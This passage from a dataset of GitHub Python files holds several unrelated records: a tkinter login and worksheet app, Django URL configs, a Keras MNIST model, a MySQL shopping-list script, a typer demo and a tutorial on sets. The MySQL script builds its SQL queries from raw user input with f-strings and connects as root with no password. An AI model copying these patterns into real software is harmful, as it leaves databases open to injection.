3.5 and above.\")\n\nhere = path.abspath(path.dirname(__file__))\nwith open(path.join(here, 'README.rst'), encoding='utf-8') as f:\n long_description = f.read()\n\nsetup(\n name=\"tornado-razorpay\",\n version=\"0.1.3\",\n description=\"Razorpay Asynchronous Tornado Python Client\",\n url=\"https://github.com/nkanish2002/tornado-razorpay\",\n author=\"Anish Gupta\",\n author_email=\"nkanish2002@gmail.com\",\n license=\"MIT\",\n install_requires=[\"tornado>4\"],\n package_dir={'tornado_razorpay': 'tornado_razorpay'},\n packages=find_packages(),\n keywords='razorpay payment gateway india tornado async',\n classifiers=[\n \"Development Status :: 4 - Beta\",\n \"Intended Audience :: Developers\",\n \"License :: OSI Approved :: MIT License\",\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 3\",\n \"Topic :: Software Development :: Libraries :: Python Modules\",\n ]\n)\n","repo_name":"nkanish2002/tornado-razorpay","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"20794085506","text":"from tkinter import *\nfrom tkinter import ttk\nfrom PIL import ImageTk, Image\nfrom tkhtmlview import HTMLLabel\nfrom tkinter import messagebox\nimport random\n# test\nfrom sheetScrape import importList\nimport back as b\n\n\nglobal_name = ''\nuser_info = {}\n\n#Stores user info in tuples of name and password...\nuserList = []\n\n#Test Values for until Garrett finishes Backend...\ntestName = \"Jake\"\ntestPwd = \"123\"\ntestRatings = [1, 2, 3, 4, 5]\ntestSource = \"kutasoftware.com\"\ntestTokens = 13\n\n#Main program...\nroot = Tk()\nroot.title('Sheet Search')\nroot.iconbitmap('9iRb8Xq6T.ico')\nroot.geometry(\"200x200\")\n\n#For errors...\nsigninError = \"Incorrect username or password.\"\nsignupError = \"Please make sure passwords match.\"\ndef popup(error):\n messagebox.showerror(\"Oops!\", error)\n return\n\n#For getting rid of a window...\ndef exitProgram(root):\n root.destroy()\n return\n\n#For opening login page...\ndef openLogin():\n top = Toplevel()\n 
top.title('Login Page')\n top.geometry(\"700x600\")\n #Make frame for login...\n loginFrame = LabelFrame(top, padx=50, pady=50)\n loginFrame.pack(padx=100, pady=100)\n\n #Populate loginFrame w/ Labels...\n userLabel = Label(loginFrame, text=\"Username: \")\n pwdLabel = Label(loginFrame, text=\"Password: \")\n\n userLabel.grid(row=0, column=0)\n pwdLabel.grid(row=1, column=0)\n\n #Populate loginFrame w/ Input Bars...\n userEntry = Entry(loginFrame)\n pwdEntry = Entry(loginFrame)\n\n userEntry.grid(row=0, column=3)\n pwdEntry.grid(row=1, column=3)\n\n #Populate loginFrame w/ Submit Button...\n submitButton = Button(loginFrame, text=\"Submit\", command = lambda: [submitInfo(userEntry, pwdEntry, top)])\n submitButton.grid(row=2, column=2)\n\n #Make frame for new users...\n newbieFrame = LabelFrame(top, padx=10, pady=10)\n newbieFrame.pack(padx=20, pady=20)\n\n #Populate newbieFrame w/ Label...\n registerLabel = Label(newbieFrame, text=\"New to SheetSearch?\")\n registerLabel.pack()\n\n #Populate newbieFrame w/ Register Button...\n registerButton = Button(newbieFrame, text=\"Sign Up\", command= lambda: [signUp0(), exitProgram(top)])\n registerButton.pack(padx=10, pady=10)\n\n return\n\n#For submitting info...\ndef submitInfo(name, pwd, root):\n global global_name\n username = name.get()\n exists = not(b.isNameFree(username, '.txt'))\n password = pwd.get()\n\n print(exists)\n\n if exists:\n is_right = b.checkPassword(username, password)\n if is_right:\n openHomePage()\n root.destroy()\n return\n \n popup(signinError)\n root.destroy()\n global_name = name\n openLogin()\n\n\n#For signing up...\ndef signUp0():\n\n top = Toplevel()\n top.title('Registration')\n top.geometry(\"700x500\")\n\n #Make frame for login...\n registrationFrame = LabelFrame(top, padx=50, pady=50)\n registrationFrame.pack(padx=100, pady=100, expand=True)\n\n #Populate loginFrame w/ Labels...\n userLabel = Label(registrationFrame, text=\"Enter username: \").grid(row=0, column=0)\n pwdLabel = Label(registrationFrame, text=\"Enter password: \").grid(row=1, column=0)\n confPwdLabel = Label(registrationFrame, text=\"Confirm password: \").grid(row=2, column=0)\n\n #Populate loginFrame w/ Input Bars...\n userEntry = Entry(registrationFrame)\n pwdEntry = Entry(registrationFrame)\n confPwdEntry = Entry(registrationFrame)\n\n userEntry.grid(row=0, column=3)\n pwdEntry.grid(row=1, column=3)\n confPwdEntry.grid(row=2, column=3)\n\n registrationButton = Button(registrationFrame, text=\"Continue\", command= lambda: [enterInfo(userEntry.get(), pwdEntry.get(), confPwdEntry.get()), exitProgram(top)])\n registrationButton.grid(row=3, column=2)\n\n #return\n\n #For registering users and storing their info...\n def enterInfo(name, pwd, cpwd):\n global user_info\n global global_name\n if not(b.isNameFree(name, '.txt')):\n popup(\"That username is already taken!\")\n signUp0()\n return\n # if password matches in both boxes\n if pwd != cpwd:\n popup(signupError)\n signUp0()\n return\n\n #userTuple = (name, pwd)\n #userList.append(userTuple) #BACKEND: Store tuple as user file...\n global_name = name\n user_info['username'] = name\n user_info['pwd'] = pwd\n signUp1()\n \ndef signUp1():\n top = Toplevel()\n top.title('Registration1')\n top.geometry(\"700x500\")\n\n #Make frame for login...\n registrationFrame = LabelFrame(top, padx=50, pady=50)\n registrationFrame.pack(padx=100, pady=100, expand=True)\n\n # add another data filed to this list and label will be created and its entry will be passed to function to be written to .txt file\n fields = 
[\"age\", \"pronouns\", \"school\"]\n entries = []\n for i in range(len(fields)):\n Label(registrationFrame, text=\"Enter your {}\".format(fields[i])).grid(row=i, column=0)\n entries.append(Entry(registrationFrame))\n entries[i].grid(row=i, column=3)\n\n registrationButton = Button(registrationFrame, text=\"Register\", command= lambda: [enterInfo([e.get() for e in entries]), exitProgram(top)])\n registrationButton.grid(row=3, column=2)\n\n def enterInfo(args):\n global user_info\n for i in range(len(args)):\n user_info[i] = args[i]\n b.createUser(global_name, user_info)\n openHomePage()\n\n\n#For opening homepage...\ndef openHomePage():\n top = Toplevel()\n top.title('Home')\n top.geometry(\"400x500\")\n\n libraryButton = Button(top, text=\"Sheet Library\", command = lambda: [openLibrary(), top.destroy()])\n libraryButton.pack()\n\n profileButton = Button(top, text=\"Profile\", command = lambda: [openProfile(), top.destroy()])\n profileButton.pack()\n\n quitButton = Button(top, text=\"Quit\", command = lambda: top.destroy())\n quitButton.pack()\n\n return\n\n#For opening worksheet library...\ndef openLibrary():\n testName = \"Jake\"\n testPwd = \"123\"\n testRatings = [1, 2, 3, 4, 5]\n testSource = \"kutasoftware.com\"\n\n top = Toplevel()\n top.title('Worksheet Library')\n top.geometry(\"1000x800\")\n\n #Create a main frame\n main_frame = Frame(top)\n main_frame.pack(fill=BOTH, expand=1)\n\n #Create a canvas\n my_Canvas = Canvas(main_frame)\n my_Canvas.pack(side=LEFT, fill=BOTH, expand=1)\n\n #Add a scrollbar\n my_scrollbar = ttk.Scrollbar(main_frame, orient=VERTICAL, command=my_Canvas.yview)\n my_scrollbar.pack(side=RIGHT, fill=Y)\n\n #Configure the canvas\n my_Canvas.configure(yscrollcommand=my_scrollbar.set)\n my_Canvas.bind('', lambda e: my_Canvas.configure(scrollregion = my_Canvas.bbox(\"all\")))\n\n #Create another frame inside the canvas\n second_frame = Frame(my_Canvas)\n\n #Add that New frame to a window in the canvas\n my_Canvas.create_window((0,0), window=second_frame, anchor=\"nw\")\n\n #Frame for both links and ratings...\n entireFrame = LabelFrame(second_frame)\n entireFrame.pack()\n\n #Home button...\n homeFrame = LabelFrame(entireFrame)\n homeFrame.grid(row=1, column=2)\n\n returnHomeButton = Button(homeFrame, text=\"Home\", command= lambda: [openHomePage(), top.destroy()])\n returnHomeButton.pack()\n\n #Links...\n linkFrame = LabelFrame(entireFrame)\n linkFrame.grid(row=2, column=1)\n\n #Sources...\n sourceFrame = LabelFrame(entireFrame)\n sourceFrame.grid(row=2, column=2)\n\n #Ultimate rating frame...\n ultRatingFrame = LabelFrame(entireFrame)\n ultRatingFrame.grid(row=2, column=3)\n\n all_users = b.getAllUsers()\n\n widgets_and_data = []\n f = open(\"users/sheets_to_user_name.txt\", \"w+\")\n #List of items with their url, source, and rating...\n for i, j, k in importList: #NEEDS TO BE MODIFIED...\n index = 0\n\n # i just ran this one to assign a username to all of these sheets...\n \n ''' \n rand_user = random.choice(all_users)\n b.createSheet(rand_user, j, k)\n \n f.write(j + \"\\n\")\n f.write(rand_user + \"\\n\")\n f.write(\"\\n\")\n '''\n\n\n\n\n disableVar = ACTIVE\n def disableButton():\n disableVar = DISABLED\n return\n\n #links...\n linkLabel = HTMLLabel(linkFrame, html=' {} '.format(i, j), borderwidth=5, height=2, width=50, relief=RIDGE)\n linkLabel.pack()\n\n #Sources,,,\n sourceLabel = Label(sourceFrame, text=\"Source: {}\".format(testSource), borderwidth=5, height=2, width=50, relief=RIDGE)\n sourceLabel.pack()\n\n #Ratings...\n ratingFrame = 
LabelFrame(ultRatingFrame)\n ratingFrame.pack()\n\n randomRating = random.choice(testRatings)\n ratingLabel = Label(ratingFrame, text=\"Rating: {}\".format(str(randomRating)), borderwidth=5, height=1, width=50, relief=RIDGE)\n ratingLabel.grid(row=1, column=1)\n\n finalRatingsFrame = LabelFrame(ratingFrame, relief=RIDGE)\n finalRatingsFrame.grid(row=1, column=2)\n\n rateInput = Entry(finalRatingsFrame, borderwidth=5, width=4, relief=RIDGE)\n rateInput.grid(row=1, column=1)\n\n rateButton = Button(finalRatingsFrame, text=\"Rate\", command = lambda: [rateSheet(index), disableButton()], borderwidth=5, height=2, width=4, relief=RAISED, state=disableVar)\n rateButton.grid(row=1, column=2)\n\n widgets_and_data.append([rateButton, rateInput, j])\n index += 1\n #Use sorted sheet list to create search hierarchy w/ dropdown menu...\n f.close()\n #For rating sheets...\n def rateSheet(index):\n #...\n b.applyRating(b.get_user_by_sheet(widgets_and_data[index][2]), widgets_and_data[index][2], widgets_and_data[index][1])\n\n#For opening profile page\ndef openProfile():\n top = Toplevel()\n top.title('Login Page')\n top.geometry(\"700x600\")\n\n nameLabel = Label(top, text=\"Username: {}\".format(testName))\n nameLabel.pack()\n\n tokenLabel = Label(top, text=\"Tokens: {}\".format(testTokens))\n tokenLabel.pack()\n\n returnHomeButton = Button(top, text=\"Home\", command= lambda: [openHomePage(), top.destroy()])\n returnHomeButton.pack()\n\n #Space to upload link...\n\n return\n\nstartButton = Button(text=\"Start\", command=openLogin)\nstartButton.pack()\n\nquitButton = Button(text=\"Quit\", command=root.destroy)\nquitButton.pack()\n\n#Finish GUI...\nroot.mainloop()\n","repo_name":"ggilliom/LevelUp-Su21","sub_path":"sheetSearchGUI.py","file_name":"sheetSearchGUI.py","file_ext":"py","file_size_in_byte":10299,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"4381427264","text":"from django.conf.urls.static import static\nfrom django.contrib import admin\nfrom django.conf import settings\nfrom django.contrib.staticfiles.urls import staticfiles_urlpatterns\n\nfrom django.urls import path, include\nfrom drf_spectacular.views import SpectacularRedocView, SpectacularSwaggerView, SpectacularAPIView\nfrom rest_framework_simplejwt.views import TokenRefreshView, TokenObtainPairView, TokenVerifyView\n\nfrom publication_app.views import pageNotFound\n\n\ndef trigger_error(request):\n division_by_zero = 1 / 0\n\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('', include('publication_app.urls')),\n path('', include('media_app.urls')),\n path('', include('tags_app.urls')),\n path('', include('comments_app.urls')),\n path('', include('likes_app.urls')),\n path('', include('profile_app.urls')),\n path('', include('friend_app.urls')),\n path('', include('subscription_app.urls')),\n path('api/token/verify/', TokenVerifyView.as_view(), name='token_verify'),\n path('api/token/', TokenObtainPairView.as_view(), name='token_obtain_pair'),\n path('api/token/refresh/', TokenRefreshView.as_view(), name='token_refresh'),\n path('api/schema/', SpectacularAPIView.as_view(), name='schema'),\n path('api/schema/swagger-ui/', SpectacularSwaggerView.as_view(url_name='schema'), name='swagger-ui'),\n path('api/schema/redoc/', SpectacularRedocView.as_view(url_name='schema'), name='redoc'),\n path('sentry-debug/', trigger_error),\n\n]\n\nif settings.DEBUG:\n import debug_toolbar\n\n urlpatterns = [\n path('__debug__/', include(debug_toolbar.urls))\n ] + urlpatterns\n\n 
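The per-row Rate buttons in the tkinter entry above share one late-bound `index` in their `lambda` callbacks, and `index` is even reset to 0 at the top of each loop iteration, so `rateSheet` can never receive a distinct per-row value. This is the classic closure pitfall; the usual fix is binding the loop variable as a default argument (for the record above, `command=lambda index=index: rateSheet(index)`). A minimal demonstration:

callbacks = [lambda: i for i in range(3)]
print([cb() for cb in callbacks])        # [2, 2, 2] -- all share the final i
callbacks = [lambda i=i: i for i in range(3)]
print([cb() for cb in callbacks])        # [0, 1, 2] -- value frozen per lambda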
urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n urlpatterns += staticfiles_urlpatterns()\n\n# обрабатываем исключение 404 и в view выводим другое сообщение\nhandler404 = pageNotFound\n","repo_name":"yammyk1992/django_tms","sub_path":"my_django/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1995,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"70616812914","text":"from django.conf.urls.defaults import patterns, include, url\nfrom django.views.generic import ListView, DetailView\nfrom knowledgeBase.models import Memo, Article, Faq, Library\nfrom django.contrib import admin\nadmin.autodiscover()\n\n\nurlpatterns = patterns('', \n \n (r'^$', 'knowledgeBase.views.index'), \n \n\n (r'^article/(?P\\d+)/$',\n DetailView.as_view(\n model=Article\n )), \n (r'^article/$', ListView.as_view(\n model=Article,\n )),\n\n (r'^faq/$', ListView.as_view(\n model=Faq,\n )),\n\n (r'^library/(?P\\d+)/$',\n DetailView.as_view(\n model=Library\n )), \n (r'^library/$', ListView.as_view(\n model=Library,\n )),\n \n (r'^memos/(?P\\d+)/$',\n DetailView.as_view(\n model=Memo\n )), \n (r'^memos/$', ListView.as_view(\n model=Memo,\n )), \n \n (r'^admin/', include(admin.site.urls)), \n\n)\n","repo_name":"dvynograd/python_django_apollo","sub_path":"urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"71885190834","text":"import numpy as np\nimport keras\nimport matplotlib.pyplot as plt\nfrom keras.datasets import mnist\nfrom keras.utils.np_utils import to_categorical\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Flatten\nfrom keras.optimizers import Adam\nfrom keras.layers.convolutional import MaxPooling2D, Conv2D\n\n(X_train, y_train), (X_test, y_test) = mnist.load_data()\n\nX_train = np.expand_dims(X_train, axis=3)\nX_test = np.expand_dims(X_test, axis=3)\n\n\ny_train = to_categorical(y_train, 10)\ny_test = to_categorical(y_test, 10)\n\nX_train, X_test = X_train/255, X_test/255\n\ndef my_convnet_1():\n model = Sequential()\n\n model.add(Conv2D(32, (5, 5), input_shape=(28, 28, 1), activation='relu'))\n model.add(MaxPooling2D(2, 2))\n\n model.add(Conv2D(64, (3, 3), activation='relu'))\n model.add(MaxPooling2D(2, 2))\n\n model.add(Flatten())\n model.add(Dense(100, activation='relu'))\n\n model.add(Dropout(0.5))\n model.add(Dense(10, activation='softmax'))\n\n model.compile(Adam(lr=0.01), loss='categorical_crossentropy', metrics=['accuracy'])\n\n return model\n\nmodel = my_convnet_1()\nhistory = model.fit(X_train, y_train, epochs=10, validation_split=0.2, batch_size=256, verbose=1, shuffle=True)\n\nplt.plot(history.history['loss'])\nplt.plot(history.history['val_loss'])\nplt.title('loss')\nplt.legend(['training', 'validation'])\nplt.show()\n\nscore = model.evaluate(X_test, y_test, verbose=0)\n\nprint('error', score[0])\nprint('accuracy', score[1])\n\nmodel.save('CNN_model.h5')","repo_name":"co-codin/DjangoIntegrationWithCNN","sub_path":"classifier/cnn_model/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"9340393756","text":"########################PROJETO DB#########################################\r\n\r\nfrom ast import Return, 
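The Keras MNIST entry above ends by saving the trained network to `CNN_model.h5`. A hypothetical follow-up sketch, reloading that file and classifying one test digit with the same preprocessing (this assumes the training script already ran and the file exists):

import numpy as np
from keras.datasets import mnist
from keras.models import load_model

(_, _), (x_test, y_test) = mnist.load_data()
model = load_model('CNN_model.h5')   # the file saved by the script above
# Scale to [0, 1] and add the trailing channel axis, as in training.
sample = np.expand_dims(x_test[:1] / 255.0, axis=3)
print('predicted:', int(model.predict(sample).argmax()),
      'actual:', int(y_test[0]))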
While\r\nimport mysql.connector\r\nfrom numpy import true_divide\r\nfrom datetime import date\r\nfrom datetime import datetime\r\n\r\nconexao = mysql.connector.connect(\r\n host=\"localhost\",\r\n user=\"root\",\r\n password=\"\",\r\n database=\"smartlist\"\r\n)\r\n\r\n\r\n################### COMANDOS PARA UTILZIACAO #############################\r\n#cursor = conexao.cursor() #indicador de inicio de conexao\r\n#comando =''\r\n#cursor.execute(comando)\r\n#conexao.commit() # Utilizar quando edita (Updade ou Delete) o BD\r\n# resultado = cursor.fetchall() # utilziar apra leitura do BD\r\n#cursor.close()\r\n#conexao.close() #indicador de finalziacao de conexao\r\n\r\n\r\ncursor = conexao.cursor() #indicador de inicio de conexao\r\n\r\nAppinit = True\r\ninit = True\r\n\r\n\r\n\r\n\r\nprint(\"\\n###################### Ola, Bem vindo ao SmartList ################################## \\n \")\r\nwhile init == True:\r\n print(\"###################### Digite Seus Dados para Iniciar ################################## \\n\\n \")\r\n Nome = input (\"Digite seu Nome : \")\r\n Cpf = input (\"Digite seu CPF : \")\r\n Cell = input (\"Digite seu Celular: \")\r\n Email = input (\"Digite seu Email: \")\r\n Endereco = input (\"Digite seu Endereco: \")\r\n comando1 = f'INSERT INTO Users (name, cpf, phone, mail, location) VALUES (\"{Nome}\", \"{Cpf}\", \"{Cell}\", \"{Email}\", \"{Endereco}\")'\r\n\r\n print(\"\\n ###################### Otimo!!! Ola \", Nome, \"Agora preciso que Digite onde esta realizando suas compras? ################################## \\n\\n \")\r\n\r\n NomeStore = input (\"Digite seu Nome da Loja : \")\r\n EnderecoStore = input (\"Digite o Endereco da Loja: \")\r\n CustoStore = input (\"Digite o Custo de Deslocamento: \")\r\n comando2 = f'INSERT INTO Store (name, location, comutecost) VALUES (\"{NomeStore}\", \"{EnderecoStore}\", \"{CustoStore}\")'\r\n\r\n print(\"###################### Tudo certo!!!\", Nome ,\"vamos as ompras no \", NomeStore ,\" ################################## \\n\\n \")\r\n Confirmar = input (\"Se seus dados estiverem corretos digite:\\n 1.Continuar \\n 2.Retornar \\n 3.Finalizar \\n\\n :\")\r\n if Confirmar == \"1\":\r\n init = False\r\n #Executando Commit\r\n cursor.execute(comando1)\r\n conexao.commit() # Utilizar quando edita (Updade ou Delete) o BD\r\n cursor.execute(comando2)\r\n conexao.commit() # Utilizar quando edita (Updade ou Delete) o BD\r\n \r\n while Appinit == True: # Dando Prosseguimento a aplicacao\r\n print(\"############################ Maos a obra! 
############################# \\n \")\r\n print(\"############## Selecione a opcoes que deseja Executar ################# \\n \")\r\n opcao = input (\"\\n 1 = Iniciar nova lista \\n 2 = Consultar Cadastros \\n 3 = Sair da Aplicacao \\n : \")\r\n\r\n if opcao == \"1\": # OPCAO DE INICIO DE LISTA \r\n Idlista = input (\"Digite o numero da sua lista: \")\r\n comando = f'INSERT INTO Cart_Plist (Cp_id) VALUES ({Idlista})'\r\n cursor.execute(comando)\r\n conexao.commit() # Utilizar quando edita (Updade ou Delete) o BD\r\n Valor = 0\r\n cont = 0\r\n Mult=0\r\n Mult2=0\r\n Ranterior =0\r\n Qanterior=0\r\n Linit = True\r\n \r\n print(\"############################ Vamos inciar ############################# \\n \")\r\n\r\n while Linit == True:\r\n print(\"###################################### Sua lista:\",Idlista,\"###########################################\\n \")\r\n print(\"########################## Descricao / Valor / Quantidade #####################################\\n \")\r\n consulta = f'SELECT p.description, p.unitvaluer, p.amount, l.Cp_id FROM Product p JOIN Cart_Plist l WHERE l.cp_id = ({Idlista}) order by p.description'\r\n cursor.execute(consulta)\r\n resultado = cursor.fetchall() # utilziar apra leitura do BD\r\n print(resultado, \"\\n\")\r\n Total = Ranterior - Mult\r\n TotalItens = Qanterior - Mult2\r\n print(\"######################################## Resumo ########################################### \\n \")\r\n print(\"########################### Total R$:\",Total, \"Quantidade de Itens:\",TotalItens,\" ########################## \\n\")\r\n print(\"############################ Adicione um Produto a sua lista ############################# \\n \")\r\n Descricao = input (\"Digite o Nome do Produto : \")\r\n Marca = input (\"Digite a Marca se Necessario : \")\r\n Codigo = (input (\"Digite o Codigo do Produto caso necessario: \"))\r\n Valor = float(input (\"Digite o valor Unitario do Produto: \"))\r\n Unidade = input (\"Digite a Medida do Produto: \")\r\n Quantidade = float(input (\"Digite a Quantidade: \"))\r\n comando4 = f'INSERT INTO Product (description, label, getin, unitvaluer, unit, amount) VALUES (\"{Descricao}\", \"{Marca}\", \"{Codigo}\", {Valor}, \"{Unidade}\", {Quantidade})'\r\n \r\n print(\"############################ Deseja adiconar outro produto? ############################# \\n \")\r\n Confirmar2 = input (\"Digite (1 para adicionar outro produto) (2 para retornar) ou (0 para finalizar) \\n\\n :\")\r\n if Confirmar2 == \"1\":\r\n Linit = True \r\n Mult=0\r\n Ranterior = Total + Quantidade*Valor\r\n Qanterior = TotalItens + Quantidade\r\n cursor.execute(comando4)\r\n conexao.commit() # Utilizar quando edita (Updade ou Delete) o BD\r\n elif Confirmar2 == \"2\":\r\n Linit = True\r\n i=0\r\n Mult = Quantidade*Valor\r\n Mult2 = Quantidade\r\n else:\r\n Linit = False\r\n cursor.execute(comando4)\r\n conexao.commit() # Utilizar quando edita (Updade ou Delete) o BD\r\n Total = Total + Quantidade*Valor\r\n TotalItens = TotalItens + Quantidade \r\n consulta = f'SELECT p.description, p.unitvaluer, p.amount, l.Cp_id FROM Product p JOIN Cart_Plist l WHERE l.cp_id = ({Idlista}) order by p.description' # DEMOSTRANDO A LISTA!!! 
VERIFICAR COMO MOSTRA SO A DO ID ESPECIFICO DA COMPRA\r\n cursor.execute(consulta)\r\n resultado = cursor.fetchall()\r\n print(resultado, \"\\n\")\r\n \r\n\r\n #Atualizando carrinho de comrpas na DB\r\n data_e_hora_atuais = datetime.now()\r\n data_e_hora_em_texto = data_e_hora_atuais.strftime('%d/%m/%Y %H:%M')\r\n print(\"######################################## Resumo da lista:\",Idlista,\" ########################################### \\n \")\r\n print(\"#################### Total R$:\",Total, \"Quantidade de Itens:\",TotalItens,\" ################ \\n\")\r\n comando = f'INSERT INTO Cart (Cartdate, totalvaluer, totalamount) VALUES (\"{data_e_hora_em_texto}\",{Total},{TotalItens})'\r\n cursor.execute(comando)\r\n conexao.commit() # Utilizar quando edita (Updade ou Delete) o BD\r\n \r\n print(\"#################### Como voce Avalia essa compra? ################ \\n\")\r\n Comentario = input (\"Comente algo sobre sua lista OU DEIXE EM BRANCO : \")\r\n Avaliacao = input (\"Avalie sua lista de 1 a 10 OU DEIXE EM BRANCO: \")\r\n comandoeva = f'INSERT INTO Evaluation (description, rate) VALUES (\"{Comentario}\",\"{Avaliacao}\")'\r\n cursor.execute(comandoeva)\r\n conexao.commit() # Utilizar quando edita (Updade ou Delete) o BD\r\n elif opcao == \"2\": # OPCAO DE CONSULTA DE BANCO\r\n Cinit = True\r\n while Cinit == True:\r\n print(\"#################### Voce selecionou a opcao de consulta#################### \\n\")\r\n print(\"\\n ##############digite a opcao que deseja consultar#############################\")\r\n copcao = input (\"\\n 1.Usuario \\n 2.Lojas \\n 3.Produtos \\n 4.Listas \\n 5.Avaliacoes \\n :\")\r\n if copcao == \"1\":\r\n consulta = f'SELECT * FROM Users'\r\n cursor.execute(consulta)\r\n resultado = cursor.fetchall() # utilziar apra leitura do BD\r\n print(resultado)\r\n \r\n elif copcao == \"2\":\r\n consulta = f'SELECT * FROM Store GROUP BY name ORDER BY name'\r\n cursor.execute(consulta)\r\n resultado = cursor.fetchall() # utilziar apra leitura do BD\r\n print(\"################################ RESUMO! ################################## \\n \")\r\n print(resultado)\r\n print(\"############################ FIM DE CONSULTA! ############################# \\n \")\r\n\r\n elif copcao == \"3\":\r\n print(\"################################ RESUMO! ################################## \\n \")\r\n consulta = f'SELECT * FROM Product ORDER BY description'\r\n cursor.execute(consulta)\r\n resultado = cursor.fetchall() # utilziar apra leitura do BD\r\n print(resultado)\r\n print(\"############################ FIM DE CONSULTA! ############################# \\n \")\r\n\r\n elif copcao == \"4\":\r\n consulta = f'SELECT * FROM Cart ORDER BY '\r\n cursor.execute(consulta)\r\n resultado = cursor.fetchall() # utilziar apra leitura do BD\r\n print(\"################################ RESUMO! ################################## \\n \")\r\n print(resultado)\r\n print(\"############################ FIM DE CONSULTA! ############################# \\n \")\r\n\r\n elif copcao == \"5\":\r\n consulta = f'SELECT * FROM Evaluation'\r\n cursor.execute(consulta)\r\n resultado = cursor.fetchall() # utilziar apra leitura do BD\r\n print(\"################################ RESUMO! ################################## \\n \")\r\n print(resultado)\r\n print(\"############################ FIM DE CONSULTA! 
############################# \\n \")\r\n else:\r\n Cinit = False\r\n else:\r\n Appinit = False \r\n elif Confirmar == \"2\":\r\n initr = True\r\n print(\"###################### Ok, Vamos tenrar novamente ################################## \\n \")\r\n else:\r\n initr = False\r\n print(\"###################### Agradecemos pela sua Preferencia ################################## \\n \")\r\n print(\"############################ Programa Finalizado ################################## \\n \")\r\n break","repo_name":"HyogoMoura/Banco-de-Dados-Aula","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"38417951379","text":"from typing import Dict\n\nimport click\nimport typer\nfrom rich import inspect\n\napp = typer.Typer()\napp2 = typer.Typer()\napp3 = typer.Typer()\napp.add_typer(app2, name=\"schlock\")\n\nRULES = {\n \"1\": \"Pillage, then burn.\",\n \"2\": \"A Sergeant in motion outranks a Lieutenant who doesn't know what's going on.\",\n \"3\": \"An ordnance technician at a dead run outranks everybody.\",\n \"4\": \"Close air support covereth a multitude of sins.\",\n}\n\n\n@app.callback()\ndef load_ctx(ctx: typer.Context):\n ctx.obj = {}\n ctx.obj[\"rules\"] = RULES\n\n\n@app.command()\ndef hello(ctx: typer.Context, name: str):\n typer.echo(f\"Hi {name}\")\n\n\ndef autocomplete_rules(ctx: typer.Context):\n # typer.echo(inspect(ctx))\n # typer.echo(repr(ctx.obj))\n rules: Dict = ctx.obj[\"rules\"]\n comps = list(rules.keys())\n return comps\n\n\ndef callback_check(ctx: typer.Context, value: str):\n rules: Dict = ctx.obj[\"rules\"]\n comps = list(rules)\n if value not in comps:\n raise typer.BadParameter(f\"Only 1-4 are allowed. 
tried: {value}\")\n return value\n\n\n@app2.command()\ndef says(\n ctx: typer.Context,\n index: str = typer.Argument(\n ...,\n help=\"Choose 1-4.\",\n autocompletion=autocomplete_rules,\n callback=callback_check,\n ),\n):\n \"\"\"Choose a saying.\"\"\"\n typer.echo(ctx.obj[\"rules\"][index])\n\n\nif __name__ == \"__main__\":\n app()\n","repo_name":"DonalChilde/eve-esi-jobs","sub_path":"src/eve_esi_jobs/typer_cli/typer_bug.py","file_name":"typer_bug.py","file_ext":"py","file_size_in_byte":1365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"30790736203","text":"#PYTHON-SETS##\n#sets are used to store multiple items in single variable##\n\nmyset = {\"apple\",\"banana\",\"apple\"}#here sets are not allowed duplicate values\nprint(myset)#op-apple,banana##\n\n#and sets are unchangeable once sets are created ##\n\n\n#using len() function find no index in sets##\n\nmyset = {\"apple\",\"banana\",\"cherry\"}\nprint(len(myset))#op-3\n\n\n#a set can be different data types@string,int,boolean##\nset1 = {\"apple\", \"banana\", \"cherry\"}\nset2 = {1, 5, 7, 9, 3}\nset3 = {True, False, False}\nprint(set1)\nprint(set2)\nprint(set3)\n\n##A set with strings, integers and boolean values:##\nset1 = {\"abc\", 34, True, 40, \"male\"} \nprint(set1)\n\n\n#data type of set##python defined its\" class set\" data type##\nmyset = {\"apple\",\"banana\",\"cherry\"}\nprint(type(myset))##op-\n\n#by using set() constructor make it as set #using double brackets##\nmyset = ((\"apple\",\"banana\",\"cherry\"))##it is not a set but using these constructur make a set##\nprint(myset)\n\n#access items##\n#You cannot access items in a set by referring to an index or a key.#\n#But you can loop through the set items using a for loop, or ask if a specified value is present in a set, by using the in keyword##\n\nmyset = {\"apple\",\"banana\",\"cherry\"}\nfor x in myset:\n print(x)\n\n#check if banana is present inset##\nmyset = {\"apple\",\"banana\",\"cherry\"}\nprint(\"banana\" in myset)\n#once set is created we cant change the items but we can add new items##\n\n##add item##\n#use add() function to add the item to the set##\nmyset = {\"apple\",\"banana\",\"cherry\"}\nmyset.add(\"orange\")\nprint(myset)\n\n#add the items from another set to current set by using upadte() method.##\nmyset = {\"apple\",\"banana\",\"cherry\"}\nnewset = {\"orange\",\"mango\",\"kiwi\"}\nmyset.update(newset)\nprint(myset)\n\n#WE CAN USE ITERABLE (TUPLE,list,dictionaries)these are add to set by using update() method##\nmyset = {\"apple\",\"banana\",\"cherry\"}\nnewset = [\"melon\",\"mango\",\"kiwi\"]#these all are list items##\nmyset.update(newset)\nprint(myset)\n\n#remove the set item using remove() or discard() method##\nmyset = {\"apple\",\"banana\",\"cherry\"}\nmyset.remove(\"apple\")\nprint(myset)\n ##or discard() method##\nmyset = 